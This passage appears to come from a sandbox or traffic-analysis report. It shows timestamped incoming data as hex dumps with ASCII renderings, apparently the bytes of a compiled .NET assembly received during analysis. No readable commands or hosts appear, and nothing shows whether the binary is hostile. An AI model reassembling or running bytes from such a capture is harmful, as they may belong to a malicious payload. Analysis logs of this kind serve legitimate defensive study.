00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 Data Ascii: o(zo(y`6o(\|00oo(yo(\|o(w``0o(yo(y`0+o(zo(zo(y``*0+o(yo(yo(y`
2023-11-18 09:02:35 UTC	405	IN	Data Raw: 6f c0 00 00 0a 25 72 1e 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 Data Ascii: o%rpso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso
2023-11-18 09:02:35 UTC	406	IN	Data Raw: 17 54 07 2a 1b 30 03 00 2d 00 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 Data Ascii: T0- s so,oo/0~Xs(,o(+0Q*sJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(
2023-11-18 09:02:35 UTC	408	IN	Data Raw: 28 bc 00 00 06 0a 2b 06 73 88 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 Data Ascii: (+sz*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o
2023-11-18 09:02:35 UTC	409	IN	Data Raw: 3b 01 00 06 03 6f c8 00 00 0a 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 Data Ascii: ;o(+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFo
2023-11-18 09:02:35 UTC	410	IN	Data Raw: 00 00 0a 75 53 00 00 01 0a 06 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 Data Ascii: uS,oo+ou8,(ouR,(ouQ,"o3rpoo(sJ%rpoF%oo+oF%rpoFFsJ%r&poF0'(,rpoo(rsJ%r0po
2023-11-18 09:02:35 UTC	412	IN	Data Raw: 02 7b 1b 00 00 04 2c 06 73 c9 00 00 0a 7a 02 17 7d 1b 00 00 04 02 7b 1a 00 00 04 03 6f fa 00 00 0a 6f 3c 01 00 06 0a 02 28 81 00 00 06 6f 02 01 00 06 06 6f fb 00 00 0a 2d 12 02 28 81 00 00 06 6f 03 01 00 06 06 17 6f fc 00 00 0a 06 2a 00 00 13 30 03 00 5a 00 00 00 2d 00 00 11 73 4a 00 00 06 0a 03 75 7b 00 00 01 0b 07 2d 06 73 c9 00 00 0a 7a 02 06 07 6f fd 00 00 0a 28 f9 00 00 06 06 72 d3 00 00 70 6f 46 00 00 06 07 0c 08 2c 13 08 6f fe 00 00 0a 2c 0b 06 72 74 0b 00 70 6f 46 00 00 06 06 04 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 06 2a 00 00 13 30 03 00 79 00 00 00 12 00 00 11 73 4a 00 00 06 0a 02 04 28 ee 00 00 06 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 04 28 ee 00 00 06 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 Data Ascii: {,sz}{oo<(oo-(oo0Z-sJu{-szo(rpoF,o,rtpoFoFrpoF0ysJ(,rpoFo+oF(,rpoF
2023-11-18 09:02:35 UTC	413	IN	Data Raw: ed 00 00 06 2d 0f 02 11 05 6f 24 00 00 0a 28 eb 00 00 06 2b 07 17 2b 04 16 2b 01 17 13 06 02 7b 17 00 00 04 11 06 2d 03 16 2b 01 17 6f 04 01 00 0a 06 6f 02 01 00 06 6f 47 00 00 0a 13 07 11 05 6f 24 00 00 0a 02 6f 06 00 00 2b 13 08 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 11 08 06 11 05 11 07 28 c2 00 00 06 05 0b 16 0c 11 04 17 58 13 04 11 04 09 3f 34 ff ff ff 04 1f 10 2e 0a 04 1f 15 2e 05 04 1f 1b 33 3b 06 6f 09 01 00 06 72 82 0c 00 70 6f 46 00 00 06 02 7b 17 00 00 04 16 6f 04 01 00 0a 06 6f 09 01 00 06 0e 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 7b 1a 00 00 04 6f 3a 01 00 06 02 28 82 00 00 06 2d 0c 02 7b 16 00 00 04 6f ee 00 00 0a 26 06 2a 00 13 30 04 00 cf 01 00 00 31 00 00 11 14 0a 04 03 3b 42 01 00 00 03 75 0c 00 00 02 Data Ascii: -o$(+++{-+oooGo$o+{o&(X?4..3;orpoF{ooo+oF{o&{o:(-{o&*01;Bu
2023-11-18 09:02:35 UTC	414	IN	Data Raw: 00 00 00 36 02 7e 1c 00 00 04 03 28 cc 00 00 06 2a 36 02 7e 1d 00 00 04 03 28 cc 00 00 06 2a de 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 09 01 00 0a 2d 0b 72 42 0d 00 70 73 71 00 00 0a 7a 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 0a 01 00 0a 02 04 6f c5 01 00 06 2a 13 30 04 00 bb 00 00 00 12 00 00 11 73 4a 00 00 06 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 31 34 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 04 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 06 7e 1e 00 00 04 03 6f 08 01 00 0a 6f cd 00 00 0a 6f 0b 01 00 0a 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 59 6f Data Ascii: 6~(6~(ooo-rBpsqzoooo*0sJoo14,rpoFooo+oF,rpoFr~poF~ooooFr~poF,rpoFoooYo
2023-11-18 09:02:35 UTC	415	IN	Data Raw: 06 00 00 2b 28 70 00 00 0a 6f 46 00 00 06 2b 18 07 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 07 72 b1 11 00 70 6f 46 00 00 06 07 2a 36 02 03 72 92 15 00 70 6f c8 00 00 06 2a 46 73 4a 00 00 06 25 72 a6 15 00 70 6f 46 00 00 06 2a d2 73 4a 00 00 06 25 72 c4 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 13 30 03 00 74 00 00 00 12 00 00 11 73 4a 00 00 06 0a 06 72 Data Ascii: +(poF+ooo+oFrpoF6rpoFsJ%rpoFsJ%rpoF%ooo+oF%rpoF0tsJr
2023-11-18 09:02:35 UTC	416	IN	Data Raw: d4 15 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 03 6f 96 00 00 0a 6f d9 00 00 0a 18 33 30 06 72 39 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 2b 0b 06 72 e2 15 00 70 6f 46 00 00 06 06 2a d2 73 4a 00 00 06 25 72 ec 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 57 00 00 00 00 00 00 00 73 4a 00 00 06 25 72 f8 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 08 16 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 Data Ascii: poFooo+oFoo30r9poFooo+oFrpoF+rpoFsJ%rpoF%ooo+oF%rpoF0WsJ%rpoF%ooo+oF%rpoF%ooo+oF%r
2023-11-18 09:02:35 UTC	417	IN	Data Raw: 05 03 6f 02 01 00 06 16 6f ff 00 00 0a 2e 3a 03 6f 02 01 00 06 05 6f 4e 00 00 0a 03 6f 09 01 00 06 72 62 0a 00 70 6f 46 00 00 06 03 6f 09 01 00 06 05 6f 46 00 00 06 02 7b 18 00 00 04 05 6f 30 01 00 06 16 6f 0e 01 00 0a 0e 04 2c 0d 02 7b 1a 00 00 04 04 05 6f 3b 01 00 06 2a 1b 30 03 00 88 00 00 00 3a 00 00 11 7e ea 00 00 0a 0a 04 6f 12 01 00 0a 0b 2b 64 07 6f 13 01 00 0a 0c 03 06 6f 46 00 00 06 03 08 6f b6 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 08 6f 14 01 00 0a 28 cc 00 00 0a 2d 17 03 72 3e 16 00 70 6f 46 00 00 06 03 08 6f 14 01 00 0a 6f 46 00 00 06 03 08 6f 15 01 00 0a 2d 07 72 52 16 00 70 2b 05 72 5e 16 00 70 6f 46 00 00 06 72 39 00 00 70 0a 07 6f 13 00 00 0a 2d 94 de 0a 07 2c 06 07 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 0d 00 70 7d 00 0a 00 00 00 00 Data Ascii: oo.:ooNorbpoFooF{o0o,{o;0:~o+dooFoo+oFo(-r>poFooFo-rRp+r^poFr9po-,op}
2023-11-18 09:02:35 UTC	418	IN	Data Raw: 00 00 04 1f 0f 2e 4f 04 1f 14 2e 7d 38 2b 01 00 00 04 1f 2d 30 15 04 1f 1f 3b 9e 00 00 00 04 1f 2d 3b a0 00 00 00 38 11 01 00 00 04 1f 33 3b ae 00 00 00 04 1f 34 3b d9 00 00 00 38 fc 00 00 00 03 6f 04 01 00 06 2d 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0a 01 00 06 6f 48 00 00 06 2c 17 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 Data Ascii: .O.}8+-0;-;83;4;8o-ooHooH,$ooH,ooH,oooH,$ooH
2023-11-18 09:02:35 UTC	418	IN	Data Raw: 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 04 01 00 06 14 fe 01 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0b 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f fe 00 00 06 16 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 19 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 73 88 00 00 0a 7a 96 03 6f bc 00 00 0a 1b 33 13 04 02 03 74 54 00 00 01 6f 1a 01 00 0a 6f 46 00 00 06 2a 02 03 04 28 f1 00 00 06 2a ee 02 03 28 ee 00 00 06 2c 24 04 72 d3 00 00 70 6f 46 00 00 06 04 03 02 6f 06 00 00 2b 6f 46 00 00 06 04 72 d7 00 00 70 6f 46 00 00 06 2a 04 03 02 6f 06 00 00 Data Ascii: ,ooH,o*oooH,ooHooH,$ooH,ooH,oooH,ooH,ooH*szo3tTooF((,$rpoFo+oFrpoFo
2023-11-18 09:02:35 UTC	420	IN	Data Raw: 2a 6a 02 7b 23 00 00 04 2d 0b 02 73 46 00 00 0a 7d 23 00 00 04 02 7b 23 00 00 04 2a 6a 02 7b 24 00 00 04 2d 0b 02 73 1e 01 00 0a 7d 24 00 00 04 02 7b 24 00 00 04 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 1e 02 7b 27 00 00 04 2a 1e 02 7b 28 00 00 04 2a 6a 02 7b 29 00 00 04 2d 0b 02 73 4a 00 00 06 7d 29 00 00 04 02 7b 29 00 00 04 2a 6a 02 7b 2a 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2a 00 00 04 02 7b 2a 00 00 04 2a 6a 02 7b 2b 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 2a 1e 02 7b 2c 00 00 04 2a 22 02 03 7d 2c 00 00 04 2a b6 02 7b 2b 00 00 04 2c 0f 02 7b 2b 00 00 04 6f 48 00 00 06 2d 02 17 2a 02 7b 25 00 00 04 2c 02 17 2a 02 7b 26 00 00 04 2c 02 17 2a 16 2a 00 00 1b 30 03 00 Data Ascii: j{#-sF}#{#j{$-s}${${%"}%{&"}&{'{(j{)-sJ}){)j{-sJ}{*j{+-sJ}+{+{,"},{+,{+oH-{%,{&,**0
2023-11-18 09:02:35 UTC	421	IN	Data Raw: 00 0a dc 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 33 00 30 63 00 0a 00 00 00 00 c2 02 6f df 00 00 0a 1f 0a 58 18 58 73 20 00 00 0a 02 6f 22 00 00 0a 1f 5b 6f 2f 01 00 0a 03 6f 30 01 00 0a 1f 5d 6f 2f 01 00 0a 6f 2f 00 00 0a 2a 36 28 7f 00 00 0a 02 03 28 31 01 00 0a 2a 42 02 28 7f 00 00 0a 03 04 6f 32 01 00 0a 26 02 2a 13 30 02 00 21 00 00 00 40 00 00 11 02 6f 26 00 00 0a 26 16 0a 2b 10 02 72 42 18 00 70 6f 22 00 00 0a 26 06 17 58 0a 06 03 32 ec 02 2a 7e 28 7f 00 00 0a 72 4e 03 00 70 17 8d 12 00 00 01 25 16 02 8c 19 00 00 1b a2 28 31 01 00 0a 2a 22 02 16 28 1e 01 00 06 2a 00 00 13 30 02 00 26 00 00 00 40 00 00 11 02 2c 21 03 0a 2b 14 02 06 6f 33 01 00 0a 28 34 01 00 0a 2d 02 16 2a 06 17 58 0a 06 02 6f df 00 00 0a 32 e3 17 2a 00 00 13 30 02 00 2f 00 00 00 40 Data Ascii: o/30coXXs o"[o/o0]o/o/6((1B(o2&0!@o&&+rBpo"&X2~(rNp%(1"(0&@,!+o3(4-Xo2*0/@
2023-11-18 09:02:35 UTC	422	IN	Data Raw: 01 00 0a 2a 32 02 28 4c 01 00 06 73 42 01 00 0a 2a 32 02 28 4c 01 00 06 73 43 01 00 0a 2a 32 02 28 4c 01 00 06 73 44 01 00 0a 2a 32 02 28 4c 01 00 06 73 45 01 00 0a 2a 32 02 28 4c 01 00 06 73 46 01 00 0a 2a 13 30 07 00 b5 00 00 00 47 00 00 11 03 d0 91 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2d 12 03 d0 90 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2c 55 7e 41 00 00 04 0a 28 49 01 00 0a 2c 46 28 4a 01 00 0a 72 78 18 00 70 18 8d 12 00 00 01 25 16 06 2d 07 72 fb 18 00 70 2b 06 06 6f 2f 00 00 0a a2 25 17 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a 28 4d 01 00 0a 06 2a 28 49 01 00 0a 2c 33 28 4a 01 00 0a 72 09 19 00 70 17 8d 12 00 00 01 25 16 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a Data Ascii: 2(LsB2(LsC2(LsD2(LsE2(LsF0G(G(H-(G(H,U~A(I,F(Jrxp%-rp+o/%(K-rp+o/(L(M*(I,3(Jrp%(K-rp+o/(L
2023-11-18 09:02:35 UTC	424	IN	Data Raw: 00 00 06 72 5e 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 61 01 00 00 06 72 54 17 00 70 28 7b 00 00 0a 3a 98 00 00 00 38 4c 01 00 00 06 72 27 1c 00 70 28 7b 00 00 0a 3a 8a 00 00 00 38 37 01 00 00 06 72 37 1c 00 70 28 7b 00 00 0a 3a 90 00 00 00 38 22 01 00 00 06 72 41 1c 00 70 28 7b 00 00 0a 3a 96 00 00 00 38 0d 01 00 00 06 72 53 1c 00 70 28 7b 00 00 0a 3a 99 00 00 00 38 f8 00 00 00 06 72 5f 1c 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 e3 00 00 00 06 72 69 1c 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 ce 00 00 00 06 72 02 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 b9 00 00 00 07 28 5e 01 00 0a 2a 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 16 13 04 38 a8 00 00 00 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 17 13 04 38 8d 00 00 00 1f 0c 13 Data Ascii: r^p({:8arTp({:8Lr'p({:87r7p({:8"rAp({:8rSp({:8r_p({:8rip({:8rp({:8(^*(8(8
2023-11-18 09:02:35 UTC	425	IN	Data Raw: 67 01 00 0a 16 16 28 63 01 00 0a 13 0e 2b 1b 02 28 66 01 00 0a 72 27 1c 00 70 6f 67 01 00 0a 16 16 11 0d 28 62 01 00 0a 13 0e 11 0e 2a 02 28 66 01 00 0a 72 02 17 00 70 6f 67 01 00 0a 28 5e 01 00 0a 2a 72 89 1c 00 70 03 06 6f 6c 00 00 0a 8c 1f 00 00 01 28 41 00 00 0a 73 42 00 00 0a 7a 2e 72 32 1d 00 70 28 5a 01 00 06 2a 2e 72 b5 1d 00 70 28 5a 01 00 06 2a 46 28 69 01 00 0a 02 6f 6a 01 00 0a 28 6b 01 00 0a 2a 00 00 13 30 03 00 11 00 00 00 4b 00 00 11 02 03 04 28 5c 01 00 06 0a 02 06 6f 6c 01 00 0a 2a 00 00 00 1b 30 05 00 73 01 00 00 4c 00 00 11 03 2d 0b 72 40 1e 00 70 73 1c 01 00 0a 7a 04 2d 0b 72 52 1e 00 70 73 1c 01 00 0a 7a 73 41 01 00 0a 0a 06 03 74 14 00 00 02 04 12 01 12 02 28 8b 00 00 06 6f 6d 01 00 0a 06 08 6f 6e 01 00 0a 14 0d 04 75 77 00 00 01 2c Data Ascii: g(c+(fr'pog(b(frpog(^rpol(AsBz.r2p(Z.rp(ZF(ioj(k0K(\ol0sL-r@psz-rRpszsAt(omonuw,
2023-11-18 09:02:35 UTC	426	IN	Data Raw: 8a 1f 00 70 06 08 9a 28 70 00 00 0a 28 65 01 00 06 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 17 58 0c 08 06 8e 69 32 cb 03 6f 94 01 00 0a 13 04 11 04 28 6d 01 00 06 6f 6d 01 00 0a 11 04 6f 95 01 00 0a 26 11 04 28 6c 01 00 06 6f 6d 01 00 0a 11 04 6f 95 01 00 0a 26 de 0c 11 04 2c 07 11 04 6f 12 00 00 0a dc 2a 01 28 00 00 02 00 71 00 15 86 00 0a 00 00 00 00 02 00 9e 00 17 b5 00 0a 00 00 00 00 02 00 d1 00 2a fb 00 0c 00 00 00 00 1b 30 06 00 8b 01 00 00 51 00 00 11 73 45 00 00 0a 0a 73 42 01 00 0a 0b 03 6f 94 01 00 0a 0c 73 96 01 00 0a 0d 06 28 7f 00 00 0a 72 9e 1f 00 70 07 05 6f 97 01 00 0a 6f 98 01 00 0a 26 7e ea 00 00 0a 13 04 03 6f 99 01 00 0a 13 05 04 6f 9a 01 00 0a 6f 9b 01 00 0a 13 06 2b 51 11 06 6f 16 00 00 0a 74 9a 00 00 01 13 07 11 07 6f 9c 01 00 0a 28 Data Ascii: p(p(e,oXi2o(momo&(lomo&,o(q0QsEsBos(rpoo&~ooo+Qoto(
2023-11-18 09:02:35 UTC	428	IN	Data Raw: 6f 7e 01 00 06 2a 9e 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 90 00 00 0a 6f 97 01 00 06 02 03 6f 91 00 00 0a 6f 97 01 00 06 2a 66 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 72 e8 20 00 70 73 42 00 00 0a 7a ce 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 94 00 00 0a 6f 99 01 00 06 02 03 6f 95 00 00 0a 6f 97 01 00 06 02 03 6f 94 00 00 0a 6f 98 01 00 06 2a 6e 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 96 00 00 0a 6f 9a 01 00 06 2a 00 13 30 02 00 4b 00 00 00 00 00 00 00 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 97 00 00 0a 6f 9d 01 00 06 02 03 6f 99 00 00 0a 6f 9a 01 00 06 02 03 6f 97 00 00 0a 6f 9b 01 00 06 02 03 6f 9a 00 00 0a 6f 96 01 00 06 02 03 6f 97 00 00 0a 6f 9c 01 00 06 2a 00 13 30 02 00 4b 00 00 00 00 00 00 00 03 2d Data Ascii: o~-r ps]zoooof-r ps]zr psBz-r ps]zoooooon-r ps]zoo0K-r ps]zoooooooooo*0K-
2023-11-18 09:02:35 UTC	429	IN	Data Raw: 0c 00 00 2b 2c 21 72 76 21 00 70 03 6f 3e 00 00 0a 6f 40 00 00 0a 02 7b 4a 00 00 04 28 41 00 00 0a 73 42 00 00 0a 7a 02 7b 45 00 00 04 03 6f 3e 00 00 0a 28 9d 00 00 06 6f 22 00 00 0a 26 2a 62 02 7b 45 00 00 04 03 6f f7 00 00 0a 28 04 00 00 06 6f 22 00 00 0a 26 2a 4a 02 7b 45 00 00 04 72 26 0b 00 70 6f 22 00 00 0a 26 2a 00 1b 30 03 00 49 00 00 00 58 00 00 11 17 0a 03 6f a2 00 00 0a 6f d1 00 00 0a 0b 2b 24 07 6f d2 00 00 0a 06 2c 04 16 0a 2b 11 02 7b 45 00 00 04 72 39 00 00 70 6f 22 00 00 0a 26 02 6f 25 00 00 0a 07 6f 13 00 00 0a 2d d4 de 0a 07 2c 06 07 6f 12 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 0e 00 30 3e 00 0a 00 00 00 00 13 30 02 00 48 00 00 00 00 00 00 00 02 7b 45 00 00 04 72 d3 00 00 70 6f 22 00 00 0a 26 03 6f 90 00 00 0a 02 6f 25 00 00 0a 02 7b Data Ascii: +,!rv!po>o@{J(AsBz{Eo>(o"&b{Eo(o"&J{Er&po"&0IXoo+$o,+{Er9po"&o%o-,o0>0H{Erpo"&oo%{
2023-11-18 09:02:35 UTC	430	IN	Data Raw: 2a 03 74 56 00 00 01 0b 04 74 56 00 00 01 0c 07 6f f7 00 00 0a 08 6f f7 00 00 0a 33 13 02 07 6f a5 00 00 0a 08 6f a5 00 00 0a 28 c9 01 00 06 2a 16 2a 16 2a 00 00 00 13 30 02 00 75 00 00 00 3d 00 00 11 03 6f bc 00 00 0a 0a 06 1f 2b 30 0b 06 1a 2e 13 06 1f 2b 2e 20 2b 57 06 1f 2e 2e 30 06 1f 38 2e 3c 2b 4b 02 03 74 2b 00 00 01 6f b8 00 00 0a 28 ca 01 00 06 2a 03 74 3e 00 00 01 6f f3 00 00 0a 6f cf 01 00 0a 20 ff ff ff 7f 61 2a 03 74 56 00 00 01 6f f7 00 00 0a 6f cf 01 00 0a 2a 03 74 49 00 00 01 6f fa 00 00 0a 6f cf 01 00 0a 2a 03 6f cf 01 00 0a 2a 2e 73 c8 01 00 06 80 58 00 00 04 2a 2e 73 cd 01 00 06 80 59 00 00 04 2a 3a 03 6f bc 00 00 0a 1f 18 fe 01 16 fe 01 2a 2e 03 6f bc 00 00 0a 1f 18 fe 01 2a 13 30 04 00 39 00 00 00 0f 00 00 11 03 16 52 02 6f 72 00 00 Data Ascii: tVtVoo3oo(*0u=o+0.+. +W..08.<+Kt+o(t>oo atVootIooo.sX.sY:o.o09Ror
